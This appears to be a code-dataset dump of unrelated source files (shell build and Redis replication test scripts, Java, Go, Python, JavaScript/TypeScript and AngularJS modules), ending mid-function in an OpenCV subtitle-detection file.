text
stringlengths
1
1.05M
#!/bin/bash #TODO: # - fix all the hard-coding STARTDIR=`pwd` find $STARTDIR -iname '*.h' -type f -exec sed -i 's/\t/ /g' {} + find $STARTDIR -iname '*.cpp' -type f -exec sed -i 's/\t/ /g' {} + clang-format -i $STARTDIR/modules/*.cpp $STARTDIR/modules/*.h clang-format -i $STARTDIR/examples/*/*.cpp
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var Utils = /** @class */ (function () { function Utils() { } Utils.prototype.isNoEmptyString = function (value) { return typeof value === 'string' && value.length > 0; }; return Utils; }()); var utils = new Utils(); exports.default = utils; //# sourceMappingURL=Utils.js.map
using System.Runtime.Serialization; public class Processor { public string Name { get; set; } [DataMember(Name = "NumberOfCores", Order = 2)] public int NumberOfCores { get; set; } [DataMember(Name = "NumberOfLogicalProcessors", Order = 3)] public int NumberOfLogicalProcessors { get; set; } [DataMember(Name = "L2CacheSize", Order = 4)] public int L2CacheSize { get; set; } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.carbondata.datamap.bloom; import java.io.DataOutputStream; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import org.apache.carbondata.common.annotations.InterfaceAudience; import org.apache.carbondata.common.logging.LogService; import org.apache.carbondata.common.logging.LogServiceFactory; import org.apache.carbondata.core.constants.CarbonCommonConstants; import org.apache.carbondata.core.datamap.Segment; import org.apache.carbondata.core.datamap.dev.DataMapWriter; import org.apache.carbondata.core.datastore.block.SegmentProperties; import org.apache.carbondata.core.datastore.impl.FileFactory; import org.apache.carbondata.core.datastore.page.ColumnPage; import org.apache.carbondata.core.keygenerator.KeyGenerator; import org.apache.carbondata.core.keygenerator.columnar.ColumnarSplitter; import org.apache.carbondata.core.metadata.datatype.DataTypes; import org.apache.carbondata.core.metadata.encoder.Encoding; import org.apache.carbondata.core.metadata.schema.table.column.CarbonColumn; import org.apache.carbondata.core.metadata.schema.table.column.CarbonDimension; import org.apache.carbondata.core.util.CarbonUtil; import org.apache.commons.collections.CollectionUtils; import org.apache.commons.collections.Predicate; import org.apache.hadoop.util.bloom.CarbonBloomFilter; import org.apache.hadoop.util.bloom.Key; import org.apache.hadoop.util.hash.Hash; @InterfaceAudience.Internal public abstract class AbstractBloomDataMapWriter extends DataMapWriter { private static final LogService LOG = LogServiceFactory.getLogService( BloomDataMapWriter.class.getCanonicalName()); private int bloomFilterSize; private double bloomFilterFpp; private boolean compressBloom; protected int currentBlockletId; private List<String> currentDMFiles; private List<DataOutputStream> currentDataOutStreams; protected List<CarbonBloomFilter> indexBloomFilters; private KeyGenerator keyGenerator; private ColumnarSplitter columnarSplitter; // for the dict/sort/date column, they are encoded in MDK, // this maps the index column name to the index in MDK private Map<String, Integer> indexCol2MdkIdx; // this gives the reverse map to indexCol2MdkIdx private Map<Integer, String> mdkIdx2IndexCol; AbstractBloomDataMapWriter(String tablePath, String dataMapName, List<CarbonColumn> indexColumns, Segment segment, String shardName, SegmentProperties segmentProperties, int bloomFilterSize, double bloomFilterFpp, boolean compressBloom) throws IOException { super(tablePath, dataMapName, indexColumns, segment, shardName); this.bloomFilterSize = bloomFilterSize; this.bloomFilterFpp = bloomFilterFpp; this.compressBloom = compressBloom; currentDMFiles = new ArrayList<>(indexColumns.size()); currentDataOutStreams = new ArrayList<>(indexColumns.size()); indexBloomFilters = new ArrayList<>(indexColumns.size()); initDataMapFile(); resetBloomFilters(); keyGenerator = segmentProperties.getDimensionKeyGenerator(); columnarSplitter = segmentProperties.getFixedLengthKeySplitter(); this.indexCol2MdkIdx = new HashMap<>(); this.mdkIdx2IndexCol = new HashMap<>(); int idx = 0; for (final CarbonDimension dimension : segmentProperties.getDimensions()) { if (!dimension.isGlobalDictionaryEncoding() && !dimension.isDirectDictionaryEncoding()) { continue; } boolean isExistInIndex = CollectionUtils.exists(indexColumns, new Predicate() { @Override public boolean evaluate(Object object) { return ((CarbonColumn) object).getColName().equalsIgnoreCase(dimension.getColName()); } }); if (isExistInIndex) { this.indexCol2MdkIdx.put(dimension.getColName(), idx); this.mdkIdx2IndexCol.put(idx, dimension.getColName()); } idx++; } } @Override public void onBlockStart(String blockId) throws IOException { } @Override public void onBlockEnd(String blockId) throws IOException { } @Override public void onBlockletStart(int blockletId) { } protected void resetBloomFilters() { indexBloomFilters.clear(); List<CarbonColumn> indexColumns = getIndexColumns(); int[] stats = calculateBloomStats(); for (int i = 0; i < indexColumns.size(); i++) { indexBloomFilters .add(new CarbonBloomFilter(stats[0], stats[1], Hash.MURMUR_HASH, compressBloom)); } } /** * It calculates the bits size and number of hash functions to calculate bloom. */ private int[] calculateBloomStats() { /* * n: how many items you expect to have in your filter * p: your acceptable false positive rate * Number of bits (m) = -n*ln(p) / (ln(2)^2) * Number of hashes(k) = m/n * ln(2) */ double sizeinBits = -bloomFilterSize * Math.log(bloomFilterFpp) / (Math.pow(Math.log(2), 2)); double numberOfHashes = sizeinBits / bloomFilterSize * Math.log(2); int[] stats = new int[2]; stats[0] = (int) Math.ceil(sizeinBits); stats[1] = (int) Math.ceil(numberOfHashes); return stats; } @Override public void onBlockletEnd(int blockletId) { writeBloomDataMapFile(); currentBlockletId++; } @Override public void onPageAdded(int blockletId, int pageId, int pageSize, ColumnPage[] pages) throws IOException { for (int rowId = 0; rowId < pageSize; rowId++) { // for each indexed column, add the data to index for (int i = 0; i < indexColumns.size(); i++) { Object data = pages[i].getData(rowId); addValue2BloomIndex(i, data); } } } protected void addValue2BloomIndex(int indexColIdx, Object value) { byte[] indexValue; // convert measure to bytes // convert non-dict dimensions to simple bytes without length // convert internal-dict dimensions to simple bytes without any encode if (indexColumns.get(indexColIdx).isMeasure()) { if (value == null) { value = DataConvertUtil.getNullValueForMeasure(indexColumns.get(indexColIdx).getDataType()); } indexValue = CarbonUtil.getValueAsBytes(indexColumns.get(indexColIdx).getDataType(), value); } else { if (indexColumns.get(indexColIdx).hasEncoding(Encoding.DICTIONARY) || indexColumns.get(indexColIdx).hasEncoding(Encoding.DIRECT_DICTIONARY)) { indexValue = convertDictionaryValue(indexColIdx, (byte[]) value); } else { indexValue = convertNonDictionaryValue(indexColIdx, (byte[]) value); } } if (indexValue.length == 0) { indexValue = CarbonCommonConstants.MEMBER_DEFAULT_VAL_ARRAY; } indexBloomFilters.get(indexColIdx).add(new Key(indexValue)); } protected byte[] convertDictionaryValue(int indexColIdx, byte[] value) { byte[] fakeMdkBytes; // this means that we need to pad some fake bytes // to get the whole MDK in corresponding position if (columnarSplitter.getBlockKeySize().length > indexCol2MdkIdx.size()) { int totalSize = 0; for (int size : columnarSplitter.getBlockKeySize()) { totalSize += size; } fakeMdkBytes = new byte[totalSize]; // put this bytes to corresponding position int thisKeyIdx = indexCol2MdkIdx.get(indexColumns.get(indexColIdx).getColName()); int destPos = 0; for (int keyIdx = 0; keyIdx < columnarSplitter.getBlockKeySize().length; keyIdx++) { if (thisKeyIdx == keyIdx) { System.arraycopy(value, 0, fakeMdkBytes, destPos, columnarSplitter.getBlockKeySize()[thisKeyIdx]); break; } destPos += columnarSplitter.getBlockKeySize()[keyIdx]; } } else { fakeMdkBytes = value; } // for dict columns including dictionary and date columns // decode value to get the surrogate key int surrogateKey = (int) keyGenerator.getKey(fakeMdkBytes, indexCol2MdkIdx.get(indexColumns.get(indexColIdx).getColName())); // store the dictionary key in bloom return CarbonUtil.getValueAsBytes(DataTypes.INT, surrogateKey); } protected abstract byte[] convertNonDictionaryValue(int indexColIdx, byte[] value); private void initDataMapFile() throws IOException { if (!FileFactory.isFileExist(dataMapPath)) { if (!FileFactory.mkdirs(dataMapPath, FileFactory.getFileType(dataMapPath))) { throw new IOException("Failed to create directory " + dataMapPath); } } List<CarbonColumn> indexColumns = getIndexColumns(); for (int indexColId = 0; indexColId < indexColumns.size(); indexColId++) { String dmFile = BloomCoarseGrainDataMap.getBloomIndexFile(dataMapPath, indexColumns.get(indexColId).getColName()); DataOutputStream dataOutStream = null; try { FileFactory.createNewFile(dmFile, FileFactory.getFileType(dmFile)); dataOutStream = FileFactory.getDataOutputStream(dmFile, FileFactory.getFileType(dmFile)); } catch (IOException e) { CarbonUtil.closeStreams(dataOutStream); throw new IOException(e); } this.currentDMFiles.add(dmFile); this.currentDataOutStreams.add(dataOutStream); } } protected void writeBloomDataMapFile() { List<CarbonColumn> indexColumns = getIndexColumns(); try { for (int indexColId = 0; indexColId < indexColumns.size(); indexColId++) { CarbonBloomFilter bloomFilter = indexBloomFilters.get(indexColId); bloomFilter.setBlockletNo(currentBlockletId); // only in higher version of guava-bloom-filter, it provides readFrom/writeTo interface. // In lower version, we use default java serializer to write bloomfilter. bloomFilter.write(this.currentDataOutStreams.get(indexColId)); this.currentDataOutStreams.get(indexColId).flush(); } } catch (Exception e) { for (DataOutputStream dataOutputStream : currentDataOutStreams) { CarbonUtil.closeStreams(dataOutputStream); } throw new RuntimeException(e); } finally { resetBloomFilters(); } } @Override public void finish() throws IOException { if (!isWritingFinished()) { releaseResouce(); setWritingFinished(true); } } protected void releaseResouce() { List<CarbonColumn> indexColumns = getIndexColumns(); for (int indexColId = 0; indexColId < indexColumns.size(); indexColId++) { CarbonUtil.closeStreams( currentDataOutStreams.get(indexColId)); } } }
/** * Test Server for ajax-client * * npm run test-server * * @type {createApplication} */ const server = { // Example class constructor definition //Edit Class Name TestServer: function(originalPort) { var me = this; const cookieParser = require('cookie-parser'); const express = require('express'); this.app = express(); const bodyParser = require('body-parser'); this.app.use(cookieParser()) this.app.use(bodyParser.json()); let port = process.env.PORT || 9999; if (originalPort) { port = originalPort; } //Allow CORS this.app.use(function(req, res, next) { //res.header("Access-Control-Allow-Origin", "*"); res.header('Access-Control-Allow-Origin', req.headers.origin); res.header("Access-Control-Allow-Headers", "Origin,Content-Type,Accept,X-Original-Header1,X-Original-Header2"); res.header('Access-Control-Allow-Methods', 'POST, GET, PUT, DELETE, OPTIONS'); res.header('Access-Control-Allow-Credentials', true); // res.header('Access-Control-Max-Age', '86400'); next(); }); this.app.use(express.static(__dirname)); //Handle 'post' as 'http://localhost:9999/api' this.app.post('/api', bodyParser.json(), function(req, res, next) { res.status(200); const data = req.body; if (data) { let message = "Hi,there! You say " + data.message; res.json({ output: message, }); } else { let message = 'error:message not found.'; res.json({ error: message }); } }); this.app.post('/api-error', bodyParser.json(), function(req, res, next) { res.status(500); const data = req.body; if (data) { let message = "Hi,there! You say " + data.message; res.json({ output: message, }); } else { let message = 'error:message not found.'; res.json({ error: message }); } }); this.app.post('/api-auth', bodyParser.json(), function(req, res, next) { res.status(200); const data = req.body; if (data) { res.cookie('test-name1', 'test-value1', { maxAge: 60000, httpOnly: false,// true:cannot access from JS secure: false,// true:can only send via HTTPS }); let message = "Hi,there! You say " + data.message; res.json({ output: message, 'req-cookies-copy': req.cookies, }); } else { let message = 'error:message not found.'; res.json({ error: message }); } }); this.app.post('/form', bodyParser.urlencoded({ extended: true }), function(req, res, next) { res.status(200); const data = req.body; if (data) { res.cookie('test-name2', 'test-value2', { maxAge: 60000, httpOnly: false,// true:cannot access from JS secure: false,// true:can only send via HTTPS }); let message = "Hi,there! You say " + data.message; res.json({ output: message, 'req-cookies-copy': req.cookies, }); } else { let message = 'error:message not found.'; res.json({ error: message }); } }); this.app.get('/api', bodyParser.json(), function(req, res, next) { res.status(200); const query = req.query; const data = req.body; const callback = query.callback; let message = "Hi,there! You say " + query.message; let jsonObj = { output: message }; if (data) { if (callback) { //jsonp res.header('Content-Type', 'text/javascript;charset=utf-8'); const responseText = callback + '(' + JSON.stringify(jsonObj) + ')'; res.end(responseText); } else { //ajax res.json(jsonObj); } } else { let message = 'error:message not found.'; res.json({ error: message }); } }); this.app.get('/text', bodyParser.json(), function(req, res, next) { res.status(200); res.end("example text response"); }); this.app.get('/timeout', bodyParser.json(), function(req, res, next) { res.status(200); setTimeout(() => { res.json({ output: 'Hi! This is time out api.', }); }, 3000); }); this.server = this.app.listen(port); console.log('Server started on port:' + port); } }; //Add methods to the class server.TestServer.prototype = { close: function() { console.log("Server closed"); this.server.close(); } }; module.exports = server.TestServer;
<filename>ciat-bim-cesium/src/main/java/org/jeecg/modules/bim/service/impl/BimModelAttrsServiceImpl.java package org.jeecg.modules.bim.service.impl; import org.jeecg.common.exception.JeecgBootException; import org.jeecg.common.util.oConvertUtils; import org.jeecg.modules.bim.entity.BimModelAttrs; import org.jeecg.modules.bim.mapper.BimModelAttrsMapper; import org.jeecg.modules.bim.service.IBimModelAttrsService; import org.springframework.stereotype.Service; import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper; import org.springframework.transaction.annotation.Transactional; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import com.baomidou.mybatisplus.extension.service.impl.ServiceImpl; /** * @Description: 模型属性 * @Author: jeecg-boot * @Date: 2021-12-20 * @Version: V1.0 */ @Service public class BimModelAttrsServiceImpl extends ServiceImpl<BimModelAttrsMapper, BimModelAttrs> implements IBimModelAttrsService { @Override public void addBimModelAttrs(BimModelAttrs bimModelAttrs) { //新增时设置hasChild为0 bimModelAttrs.setHasChild(IBimModelAttrsService.NOCHILD); if(oConvertUtils.isEmpty(bimModelAttrs.getParentId())){ bimModelAttrs.setParentId(IBimModelAttrsService.ROOT_PID_VALUE); }else{ //如果当前节点父ID不为空 则设置父节点的hasChildren 为1 BimModelAttrs parent = baseMapper.selectById(bimModelAttrs.getParentId()); if(parent!=null && !"1".equals(parent.getHasChild())){ parent.setHasChild("1"); baseMapper.updateById(parent); } } baseMapper.insert(bimModelAttrs); } @Override public void updateBimModelAttrs(BimModelAttrs bimModelAttrs) { BimModelAttrs entity = this.getById(bimModelAttrs.getId()); if(entity==null) { throw new JeecgBootException("未找到对应实体"); } String old_pid = entity.getParentId(); String new_pid = bimModelAttrs.getParentId(); if(!old_pid.equals(new_pid)) { updateOldParentNode(old_pid); if(oConvertUtils.isEmpty(new_pid)){ bimModelAttrs.setParentId(IBimModelAttrsService.ROOT_PID_VALUE); } if(!IBimModelAttrsService.ROOT_PID_VALUE.equals(bimModelAttrs.getParentId())) { baseMapper.updateTreeNodeStatus(bimModelAttrs.getParentId(), IBimModelAttrsService.HASCHILD); } } baseMapper.updateById(bimModelAttrs); } @Override @Transactional(rollbackFor = Exception.class) public void deleteBimModelAttrs(String id) throws JeecgBootException { //查询选中节点下所有子节点一并删除 id = this.queryTreeChildIds(id); if(id.indexOf(",")>0) { StringBuffer sb = new StringBuffer(); String[] idArr = id.split(","); for (String idVal : idArr) { if(idVal != null){ BimModelAttrs bimModelAttrs = this.getById(idVal); String pidVal = bimModelAttrs.getParentId(); //查询此节点上一级是否还有其他子节点 List<BimModelAttrs> dataList = baseMapper.selectList(new QueryWrapper<BimModelAttrs>().eq("parent_id", pidVal).notIn("id",Arrays.asList(idArr))); if((dataList == null || dataList.size()==0) && !Arrays.asList(idArr).contains(pidVal) && !sb.toString().contains(pidVal)){ //如果当前节点原本有子节点 现在木有了,更新状态 sb.append(pidVal).append(","); } } } //批量删除节点 baseMapper.deleteBatchIds(Arrays.asList(idArr)); //修改已无子节点的标识 String[] pidArr = sb.toString().split(","); for(String pid : pidArr){ this.updateOldParentNode(pid); } }else{ BimModelAttrs bimModelAttrs = this.getById(id); if(bimModelAttrs==null) { throw new JeecgBootException("未找到对应实体"); } updateOldParentNode(bimModelAttrs.getParentId()); baseMapper.deleteById(id); } } @Override public List<BimModelAttrs> queryTreeListNoPage(QueryWrapper<BimModelAttrs> queryWrapper) { List<BimModelAttrs> dataList = baseMapper.selectList(queryWrapper); List<BimModelAttrs> mapList = new ArrayList<>(); for(BimModelAttrs data : dataList){ String pidVal = data.getParentId(); //递归查询子节点的根节点 if(pidVal != null && !"0".equals(pidVal)){ BimModelAttrs rootVal = this.getTreeRoot(pidVal); if(rootVal != null && !mapList.contains(rootVal)){ mapList.add(rootVal); } }else{ if(!mapList.contains(data)){ mapList.add(data); } } } return mapList; } @Override public void updateTree() { baseMapper.updateTree(); } /** * 根据所传pid查询旧的父级节点的子节点并修改相应状态值 * @param pid */ private void updateOldParentNode(String pid) { if(!IBimModelAttrsService.ROOT_PID_VALUE.equals(pid)) { Long count = baseMapper.selectCount(new QueryWrapper<BimModelAttrs>().eq("parent_id", pid)); if(count==null || count<=1) { baseMapper.updateTreeNodeStatus(pid, IBimModelAttrsService.NOCHILD); } } } /** * 递归查询节点的根节点 * @param pidVal * @return */ private BimModelAttrs getTreeRoot(String pidVal){ BimModelAttrs data = baseMapper.selectById(pidVal); if(data != null && !"0".equals(data.getParentId())){ return this.getTreeRoot(data.getParentId()); }else{ return data; } } /** * 根据id查询所有子节点id * @param ids * @return */ private String queryTreeChildIds(String ids) { //获取id数组 String[] idArr = ids.split(","); StringBuffer sb = new StringBuffer(); for (String pidVal : idArr) { if(pidVal != null){ if(!sb.toString().contains(pidVal)){ if(sb.toString().length() > 0){ sb.append(","); } sb.append(pidVal); this.getTreeChildIds(pidVal,sb); } } } return sb.toString(); } /** * 递归查询所有子节点 * @param pidVal * @param sb * @return */ private StringBuffer getTreeChildIds(String pidVal,StringBuffer sb){ List<BimModelAttrs> dataList = baseMapper.selectList(new QueryWrapper<BimModelAttrs>().eq("parent_id", pidVal)); if(dataList != null && dataList.size()>0){ for(BimModelAttrs tree : dataList) { if(!sb.toString().contains(tree.getId())){ sb.append(",").append(tree.getId()); } this.getTreeChildIds(tree.getId(),sb); } } return sb; } }
<reponame>779789571/gin-vue-admin<filename>server/collect/online/utils2.go package online import "strings" func IsContain(items []string, item string) bool { for _, eachItem := range items { if eachItem == item { return true } } return false } //将规则内占位符生成可用规则 func ReplaceStringWithInfos(list []string, string2 string, infos string) (ruleList []string) { infoList := strings.Split(infos, "|") for _, v := range list { for _, vv := range infoList { list := strings.Replace(v, string2, "\""+vv+"\"", 1) ruleList = append(ruleList, list) } } return ruleList } func AddAutoTimeBefore(ruleList []string, afterTime string) (withTimeruleList []string) { for _, v := range ruleList { withTimeruleList = append(withTimeruleList, v+afterTime) } return withTimeruleList }
class State: def __init__(self, substance, T, P): self.substance = substance self.T = T self.P = P self.properties = {} # Placeholder for properties like u, v, s def define(self): # Implementation to define the properties of the state # Return True if properties are successfully defined, else False pass class CustomClass: def __init__(self, properties): self.properties = properties self._exergy = None def exergy(self, t0, p0): deadState = State('Water', T=t0, P=p0) if deadState.define(): self._exergy = ((self.properties['u'] - deadState.properties['u']) + p0 * (self.properties['v'] - deadState.properties['v']) - t0 * (self.properties['s'] - deadState.properties['s'])) return self._exergy else: return False def __add__(self, other): if isinstance(other, CustomClass): new_properties = {} # Perform addition of properties from self and other for key in self.properties: new_properties[key] = self.properties[key] + other.properties.get(key, 0) for key in other.properties: if key not in self.properties: new_properties[key] = other.properties[key] return CustomClass(new_properties) else: raise TypeError("Unsupported operand type for +: 'CustomClass' and {}".format(type(other).__name__)) # Example usage prop1 = {'u': 100, 'v': 200, 's': 50} prop2 = {'u': 150, 'v': 250, 's': 70} obj1 = CustomClass(prop1) obj2 = CustomClass(prop2) result = obj1 + obj2 # Addition of two instances exergy_result = obj1.exergy(300, 100) # Calculating exergy
#! /usr/bin/bash masterhost="192.168.16.1" masterport="9000" masterredis="/root/lina/redis-4.0-deg/redis-test/redis-4.0.0-volatile/src" slavehost="192.168.16.100" slaveport="9000" slaveredis="/root/lina/redis-4.0.0-volatile/src" nvm_maxcapacity=20 master_nvm_dir="/mnt/pmem4" nvm_threshold="64" slave_nvm_dir="/mnt/pmem8" ${masterredis}/redis-server --nvm-maxcapacity $nvm_maxcapacity --nvm-dir $master_nvm_dir --nvm-threshold $nvm_threshold --bind $masterhost --port $masterport & sleep 1 ssh $slavehost $slaveredis/redis-server --nvm-maxcapacity $nvm_maxcapacity --nvm-dir $slave_nvm_dir --nvm-threshold $nvm_threshold --bind $slavehost --port $slaveport --slaveof $masterhost $masterport & sleep 1 ${masterredis}/redis-benchmark -h $masterhost -p $masterport -t set -d 128 -n 10000 -r 10000 & ${masterredis}/redis-benchmark -h $masterhost -p $masterport -t set -d 1024 -n 1000000 -r 100000 echo "=====start comparing key count between master and slave...=====\n" ${masterredis}/redis-cli -h $masterhost -p $masterport info keyspace > masterkey.txt ${masterredis}/redis-cli -h $masterhost -p $masterport info keyspace ssh $slavehost $slaveredis/redis-cli -h $slavehost -p $slaveport info keyspace > slavekey.txt ssh $slavehost $slaveredis/redis-cli -h $slavehost -p $slaveport info keyspace diff masterkey.txt slavekey.txt ret=$? if [[ $ret -eq 0 ]]; then echo "Passed. Master and slave key count are the same." else echo "Failed. Master and slave key count are the different." fi echo "=====start comparing DB digetst code between master and slave...=====\n" ${masterredis}/redis-cli -h $masterhost -p $masterport debug digest > masterkey.txt cat masterkey.txt ssh $slavehost $slaveredis/redis-cli -h $slavehost -p $slaveport debug digest > slavekey.txt cat slavekey.txt diff masterkey.txt slavekey.txt ret=$? if [[ $ret -eq 0 ]]; then echo "Passed. Master and slave digest id are the same." else echo "Failed. Master and slave digett id are the different." fi rm -rf masterkey.txt slavekey.txt ssh $slavehost pkill redis pkill redis
jQuery(function($) { $.ajaxSetup({ beforeSend: function(xhr, settings) { xhr.setRequestHeader('X-CSRFToken', window.__csrf_token); } }); });
<reponame>zhoujiagen/learning-algorithms /* * TThread.java * * Created on January 3, 2007, 9:01 PM * * From "The Art of Multiprocessor Programming", * by <NAME> and <NAME>. * * This work is licensed under a Creative Commons Attribution-Share Alike 3.0 United States License. * http://i.creativecommons.org/l/by-sa/3.0/us/88x31.png */ package tamp.ch18.TinyTM; import tamp.ch18.TinyTM.exceptions.AbortedException; import tamp.ch18.TinyTM.exceptions.PanicException; import java.util.concurrent.Callable; import java.util.concurrent.atomic.AtomicInteger; public class TThread extends java.lang.Thread { static Runnable onStart = new DefaultRunnable(); static Runnable onAbort = new DefaultRunnable(); static Runnable onCommit = new DefaultRunnable(); static Callable<Boolean> onValidate = new DefaultCallable(); static public final AtomicInteger commits = new AtomicInteger(0); static public final AtomicInteger aborts = new AtomicInteger(0); public TThread() { } public static <T> T doIt(Callable<T> xaction) throws Exception { T result; Transaction me; Thread myThread = Thread.currentThread(); Exception rethrow = null; while (!myThread.isInterrupted()) { me = new Transaction(); Transaction.setLocal(me); onStart.run(); try { result = xaction.call(); if (onValidate.call() && me.commit()) { commits.getAndIncrement(); onCommit.run(); return result; } } catch (AbortedException e) { } catch (InterruptedException e) { myThread.interrupt(); } catch (Exception e) { throw new PanicException(e); } aborts.getAndIncrement(); onAbort.run(); } throw new InterruptedException(); } public static void onStart(Runnable handler) { onStart = handler; } public static void onCommit(Runnable handler) { onCommit = handler; } public static void onAbort(Runnable handler) { onAbort = handler; } public static void onValidate(Callable<Boolean> handler) { onValidate = handler; } static class DefaultRunnable implements Runnable { public void run() { } } static class DefaultCallable implements Callable<Boolean> { public Boolean call() { return true; } } }
/* * This file is part of the \BlueLaTeX project. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ angular.module("bluelatex.User.Controllers.Register",['bluelatex.User.Services.User','reCAPTCHA']) .controller('RegisterController', [ '$rootScope', '$scope', 'UserService', '$location', '$log', 'MessagesService', 'reCAPTCHA', 'config', function ($rootScope, $scope, UserService, $location, $log, MessagesService, reCAPTCHA, config) { $scope.user = {}; $scope.requesting = false; reCAPTCHA.setOptions({ theme: 'clean' }); if(config.require_validation) { MessagesService.message('_Registration_Password_will_sent_in_email_'); } $scope.displayCaptcha = config.recaptcha_public_key != null; reCAPTCHA.setPublicKey(config.recaptcha_public_key); /** * Create a new user */ $scope.register = function () { $scope.requesting = true; if($scope.displayCaptcha) { $scope.user.recaptcha_response_field = reCAPTCHA.response(); $scope.user.recaptcha_challenge_field = reCAPTCHA.challenge(); } UserService.register($scope.user).then(function (data) { MessagesService.messageSession('_Registration_Success_'); if(config.require_validation) { MessagesService.messageSession('_Check_Mailbox_'); } UserService.getInfo({"name": $scope.user.username}).then(function (data) { $rootScope.loggedUser = data; $location.path("/"); }, function (err) { $location.path("/login"); }); }, function (err) { MessagesService.clear(); switch (err.status) { case 400: MessagesService.error('_Registration_Some_parameters_are_missing_',err); break; case 401: MessagesService.error('_Registration_The_captcha_did_not_verify_',err); break; case 409: MessagesService.error('_Registration_User_with_the_same_username_already_exists_',err); break; case 500: default: MessagesService.error('_Registration_Something_wrong_happened_',err); } }).finally(function() { $scope.requesting = false; }); }; } ]);
sumDigits : Int -> Int sumDigits n = if n <= 0 then 0 else (rem n 10) + (sumDigits (quot n 10))
#!/bin/bash CUDA_VISIBLE_DEVICES=2,3,4,5,6,7 PYTHONPATH=.. python3 ../examples/run_glue.py \ --task_name ssc \ --do_train \ --do_eval \ --do_lower_case \ --data_dir ~/data-eval \ --model_type bert \ --model_name_or_path bert-base-uncased \ --max_seq_length 512 \ --per_gpu_train_batch_size 128 \ --per_gpu_eval_batch_size 128 \ --filter_long_sequences_train \ --learning_rate 2e-5 \ --num_train_epochs 3.0 \ --output_dir ~/eval/ssc-base-512-notrunctrain/
#!/bin/sh unset IFS set -euf rm -f conanbuildinfo.cmake || : rm -f graph_info.json || : rm -f conan.lock || : rm -f conanbuildinfo.txt || : rm -f conaninfo.txt || :
<reponame>Nedson202/Harvard-arts import { WithApolloClient } from 'react-apollo'; export interface IBackToTopState { displayBackToTop: boolean; } export interface IPlacesProps { center: { lat: number; lng: number; }; zoom: number; coordinates: any[]; } export interface IPlaceIDObject { parentPlaceID: number; pathForward: string; } export interface ISearchProps { client: { query: ({ }) => {}; writeQuery: ({ }) => {}; }; history: { push: ({ }) => {}, location: { pathname: string, }, }; } export interface ISearchState { value: string; toggleCloseIcon: boolean; runningSearch: boolean; [key: string]: any; } export interface EventObject { which?: number; target: { name: any, value: any, }; clipboardData?: { getData(): any, }; preventDefault(): any; } export interface ResponseObject { data: { searchResults: { results: object[], }; }; } export interface ClientObject { query: ({ }) => {}; readQuery?: ({ }) => any; } export interface ISpinnerProps { disableTip?: boolean; size?: number; } export interface IImageCardProps { imageData: { primaryimageurl: string; title?: string; }; } export interface CollectionsProps { query: ({ }) => {}; readQuery: ({ }) => any; } export interface CollectionProps { match: { params: { id: number; }; }; } export type ICollectionsProps = WithApolloClient<CollectionsProps>; export interface CollectionImages { id: string; primaryimageurl: string; } export interface CollectionResponse { object: { record: object; }; } export interface FetchMore { query: ({ }) => {}; variables: object; updateQuery: any; } export interface CollectionsFetchMore { fetchMoreResult: object; } export interface CollectionsFetchMoreResult { objects: { records: object[]; }; searchResults: { results: object[]; }; } export interface ScrollEvent { type: string; listener: (event: Event) => void; options?: { capture?: boolean, passive?: boolean }; } export interface CollectionDetail { id: string; text: string; } export interface ContextualText { context: string; text: string; } export interface ObjectInterface { [key: string]: any; } export interface FullImageViewValue { primaryimageurl: string; } export interface CollectionGroupValue { title?: string; primaryimageurl?: string; accessionmethod?: string; accessionyear?: number; century?: number; classification?: string; contextualtext?: ContextualText[]; [key: string]: any; } export interface PeopleInitials { personid: number; name: string; } export interface PublicationData { title: string; publicationid: number; volumenumber: number; volumetitle: string; format: string; publicationplace: string; description: string; people: PeopleInitials[]; } export interface PublicationsFetchMore { fetchMoreResult: object; } export interface PublicationsFetchMoreResult { publicationData: { publications: object[]; }; } export interface PublicationsQueryResponse { data: { publicationData: { publications: PublicationData[], }, }; } export interface INavbarState { isSideNavOpen: boolean; } export interface IPointerProps { text: string; } export interface IThemeProps { [key: string]: string; }
import { black, blue, green, nameLabelCrop, purple, red, subtitleFifthCrop, subtitlePartialCrop, yellow } from '../constants'; import cv from 'opencv4nodejs'; import makeNameLabel from '../mainFunctions/makeNameLabel'; import { paintMat } from '../utils/utilityCv'; import subtitleFinder from './subtitleFinder'; const { innerX, innerY } = nameLabelCrop; const rectInnerNameLabel = new cv.Rect( innerX[0], innerY[0], innerX[1] - innerX[0], innerY[1] - innerY[0] ); const { rectX, rectY } = subtitlePartialCrop; const { rectX: rectXF, rectY: rectYF } = subtitleFifthCrop; const subtitleRect = new cv.Rect( rectX[0], rectY[0], rectX[1] - rectX[0], rectY[1] - rectY[0] ); const subtitleRectFifth = new cv.Rect( rectXF[0], rectYF[0], rectXF[1] - rectXF[0], rectYF[1] - rectYF[0] ); const prevSubtitleRect = new cv.Rect( rectX[0], rectY[0] - 200, rectX[1] - rectX[0], rectY[1] - rectY[0] ); const diffSubtitleRect = new cv.Rect( rectX[0], rectY[0] - 400, rectX[1] - rectX[0], rectY[1] - rectY[0] ); const diffSubtitleRect2 = new cv.Rect( rectX[0], rectY[0] - 600, rectX[1] - rectX[0], rectY[1] - rectY[0] ); function subTractBorder(mat) { const contours = mat.findContours(cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE); const copy = mat.copy(); copy.drawContours( contours.map(item => item.getPoints()), -1, black, 1, cv.LINE_8 ); return copy; } export default function nameLabelGenerator(mat, vCap) { const { status, currentActor: { actor }, percentDiff } = makeNameLabel(mat); // eslint-disable-next-line no-console console.log('percentDiff: ', percentDiff); if (status) { const dialogMat = subtitleFinder(mat, vCap); // 